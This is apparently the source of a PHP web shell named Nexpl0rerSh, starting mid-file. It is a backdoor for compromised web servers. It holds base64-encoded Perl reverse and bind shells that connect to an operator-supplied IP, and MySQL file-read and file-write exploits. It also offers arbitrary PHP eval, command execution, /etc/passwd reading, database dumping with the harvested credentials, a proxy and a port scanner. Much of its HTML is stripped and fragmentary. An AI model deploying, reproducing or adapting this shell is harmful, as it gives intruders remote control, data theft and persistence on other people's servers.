0Kb3BlbihTVERFUlIsIj4mU0lORyIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IEJpbmQgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMoJGNtZCk7DQpjbG9zZShTSU5HKTs="); fwrite(fopen("bind.pl", "w+"), $txt); exa("perl bind.pl ".$port." ".$os); unlink("bind.pl"); } // Reverse c0nn if ($_POST['mode'] == "reverse") { chdir($dir); $os = substr(strtoupper(PHP_OS),0,3); $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQokc3lzID0gJEFSR1ZbMl07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzZTogcmV2ZXJzZS5wbCA8WW91ckhvc3Q+IDxZb3VyUG9ydD4gPHN5c3RlbT5cbiI7DQogIHByaW50ZiAiWypdIE5vdGU6IHN5c3RlbSBjYW4gYmUgTElOIG9yIFdJTiI7DQogIGV4aXQoMSk7DQp9DQppZiAoJHN5cyBlcSAiTElOIikgeyAkY21kID0gIi9iaW4vYmFzaCI7IH0NCmlmICgkc3lzIGVxICJXSU4iKSB7ICRjbWQgPSAiQzpcXFdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlIjsgfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nLi4uIFskaG9zdF1cbiI7DQokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyB1IGNhbiBjaGFuZ2UgdGhpcw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90KSB8fCBkaWUgKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30NCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IFJldmVyc2UgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMgKCRjbWQpOyA="); fwrite(fopen("reverse.pl", "w+"), $txt); exa("perl reverse.pl ".$_POST[ip]." ".$_POST[port]." ".$os); unlink("reverse.pl"); } // MySQL EXPLOIT read file if ($_POST['mode'] == "sqlexploit") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); $db = mysql_select_db($_COOKIE['mysql_name']); $path = $_POST['path']; $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);"; $delete = "DROP TABLE `nexpl0it`;"; $bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE nexpl0it;"; $fuck = "SELECT * FROM nexpl0it;"; mysql_query($delete); mysql_query($query); mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error()); $res = mysql_query($fuck)or die(mysql_error()); $txt = ""; while($row = mysql_fetch_array($res)) { $txt .= $row[path]."\n"; } $output = "File :

"; } // MySQL EXPLOIT write if ($_POST['mode'] == "sqlwritefile") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); $db = mysql_select_db($_COOKIE['mysql_name']); $path = $_POST['path']; $content = $_POST['newtext']; $txt = bin2hex($content); $query = "SELECT 0x{$txt} INTO DUMPFILE '$path';"; $res = mysql_query($query)or die(mysql_error()); $output = $path." saved!"; } // MySQL Login if ($_POST['mode'] == "loginsql") { setcookie("mysql_user", $_POST['user']); setcookie("mysql_pass",$_POST['pass']); setcookie("mysql_host",$_POST['host']); setcookie("mysql_name",$_POST['dbname']); $link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error()); $db = mysql_select_db($_POST['dbname']); $output = '
perms   name owner/group actions
'.$info.' '.$file.' '.$owner.' -
'.$info.' '.$file.' '.$owner.' Go
'.$info.' '.$file.' '.$owner.' -
'.$info.' '.$file.' '.$owner.' Go
:: MySQL Exploit ::
Edit file:
'; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= ''; } $output .= '
--[ Table List ]--
'.$table[0].'
'; } // MySQL Query if ($_POST['mode'] == "sql_query") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); $db = mysql_select_db($_COOKIE['mysql_name']); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $query = mysql_query(urldecode(stripslashes($_POST['query'])))or die("Error query: {".stripslashes($_POST[query])."} mysql says:".mysql_error()); $pars = array_keys(mysql_fetch_array($query)); $npars = count($pars); $qwords = explode(" ", $_POST['query']); global $select, $table_name; if (strtolower($qwords[0]) == "select") { $select = TRUE; $nqw = count($qwords); for($i=0;$i<$nqw;$i++) { if (strtolower($qwords[$i]) == "from") { $table_name = $qwords[$i+1]; break; } } } $parz = $pars; $p4rz = $parz; $output .= '
'; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= ''; } $output .= '
--[ Table List ]--
'.$table[0].'
--[ Query Result ]--
'; $output .= ' '; foreach($pars as $par) { $output .= (is_numeric($par) || ($par == "")) ? '' : ' '; } $output .= ''; mysql_data_seek($query, 0); while ($row = mysql_fetch_array($query, MYSQL_ASSOC)) { $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($query,$i); $w .= " `".$name."` = \'".addslashes($v)."\' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} if ($table_name == "mybb_users") $w = " uid=\'".$row['uid']."\' "; if ($table_name == "phpbb_users") $w = " user_id=\'".$row['user_id']."\' "; $output .= ''; $output .= ' '; foreach ($row as $pardd=>$rowval) { if (!is_numeric($pardd) && !empty($pardd)) { if ($row[$pardd] == "") { $output .= ''; } else { $output .= '';}} } $output .= ''; } $output .= '
 '.$par.'
NULL'.$row[$pardd].'

'; } // MySQL Update row if ($_POST['mode'] == "update") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); $db = mysql_select_db($_COOKIE['mysql_name']); $conditions = urldecode(stripslashes($_POST['conditions'])); $table = $_POST['table']; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die(mysql_error()); $output .= '
'; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= ''; } $output .= '
--[ Table List ]--
'.$table[0].'
--[ Query Result ]--
'; while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) { foreach ($row as $k=>$v) { $output .= ""; } } $output .='
{$k}
'; } // MySQL update row 2 if ($_POST['mode'] == "update2") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); $db = mysql_select_db($_COOKIE['mysql_name']); $conditions = urldecode(stripslashes(stripslashes($_POST['conditions']))); $table = $_POST['table']; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1

".mysql_error()); $uno = mysql_fetch_array($select, MYSQL_ASSOC); $pars = array_keys($uno); $query = "UPDATE {$table} SET"; foreach($pars as $fields) { $query .= " {$fields}='{$_POST[$fields]}',"; } $query = substr($query,0,strlen($query)-1); $query .= " WHERE{$conditions}"; $output = "Executed query: {$query}

"; mysql_query($query)or die("QUERY: ".$query."

ERROR:".mysql_error()); } // MySQL Dump if ($_POST['mode'] == "dump_db") { $dump = "# Dumped by Nexpl0rerSh 3.1 FUD Release \n"; $dump .= "# MySQL version: (".@mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").") \n"; $dump .= "# Database: ".$_POST['dbname']."\n"; $dump .= "# ".$_COOKIE['mysql_user'].":".$_COOKIE['mysql_pass']."@".$_COOKIE['mysql_host']."\n"; $db = $_POST['dbname']; setcookie('mysql_name', $db); $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $dump .= datadump($table[0]); } $file_name = $db."_dump_".date("d_M_Y")."_Nexpl0rer.".sql; chdir($dir); $fp = fopen($file_name, "w+"); fwrite($fp, $dump); fclose($fp); $output .= 'Dump saved in '.$dir; } // MkDir if ($_POST['mode'] == "mkdir") { chdir($dir)or die("Error."); if (mkdir($_POST['mkdir'])) { $output = "Directory created."; } } // Eval if ($_POST['mode'] == "eval") { chdir($dir); eval(stripslashes($_POST['eval'])); die(); } // phpinfo if ($_POST['mode']=="phpinfo") { phpinfo(); die(); } // tools if ($_POST['mode']=="tools") { switch($_POST['nometool']) { //passwd case 'passwd': if (!($txt = file_get_contents("/etc/passwd"))) { $output = "Cannot open /etc/passwd"; } else { $output = nl2br($txt); } break; //encoder case 'encoder': $output = "




Hashes:
md5 -
crypt -
sha1 -
crc32 -
Url:

urlencode -
urldecode -
Base64:
base64_encode -
base64_decode -  

Base convertations:
dec2hex -
"; break; // scanner case 'scanner': $scandir = str_replace(realpath("."), "", $dir); $scannersh = $dir; if ($scannersh == "") { $scannersh = "/"; } chdir($scannersh); $evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero" ); $output .= "
Ho analizzato $scannersh
"; $checked = array(); foreach (glob("*.php*") as $file) { $a = fopen($file, "r+"); $b = fread($a, filesize($file)); for ($i = 0; $i < count($evil); $i++) { $me = array_reverse(explode("/",$_SERVER['PHP_SELF'])); $str = eregi($evil[$i], $b); if (($str !== FALSE) and ($file != $me[0]) and (!in_array($file, $checked))) { array_push($checked, $file); $output .= "Trovato Possibile $evil[$i] in {$file}
"; } } fclose($a); } break; // proxy case 'proxy': $output = '
url: use curl use fopen


'; break; } } // proxysurf if ($_POST['mode'] == 'proxysurf') { $output = '
url: use curl use fopen


'; if (!$_POST[curl] && !$_POST[fopen]) { $dirz=""; $u=parse_url($_POST[url]); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; if(substr_count($file,'/')>1)$dirz=substr($file,0,(strpos($file,'/'))); $url=@fsockopen($host,80,$en,$es,12); if(!$url)die("
Can not connect to host!"); fputs($url,"GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); while(!feof($url)){ $con=fgets($url); $output .= $con; } fclose($url); } else if ($_POST[curl]) { ob_clean(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_POST[url]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ob_end_flush(); } else if ($_POST[fopen]) { $file = file($_POST[url]); foreach ($file as $line){ $output .= $line; } } } // chmod if ($_POST['mode']=="chmod") { chdir($dir); chmod($_POST[filename], intval($_POST[filemode], 8))or die("cannot change file mode"); $output = "Mode changed!"; } // portscan if ($_POST['mode']=="scan") { $opent = array(); $host = $_POST[host]; $range = range($_POST[min_port], $_POST[max_port]); foreach($range as $port) { $con = fsockopen($host, $port, $errno, $errstr, 12); if ($con) $opent[] = $port; } $output = "Found ".count($opent)." opened ports:
"; while(list($num, $value)=each($opent)) { $output .= "$num : $value
"; } } ?> <?="[nex@".getenv("HTTP_HOST")." ~]"?>
!Nexpl0rerSh v3.4.3 BL4cK Release!
Shell info: Author: Nexen Release Date: 1 June 2008
PHP Version:
Address:
Name:
Uname -a: ( )
Software:
Free of (%)
:: Edit file ::
name
:: Make File ::
name
:: Delete File ::
name
:: upload ::
:: Rename File ::
:: Make Dir ::
name
:: Cmd Execution ::
:: BackConn ::
:: Bind Port ::
:: MySQL Panel ::
" size="9" /> " /> " /> " size="10" />
:: PHP Execution ::
:: Go Dir ::
:: Proxy ::
url: curl fopen
:: File Change Mode::
:: Port Scan ::

Directory: ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } ?>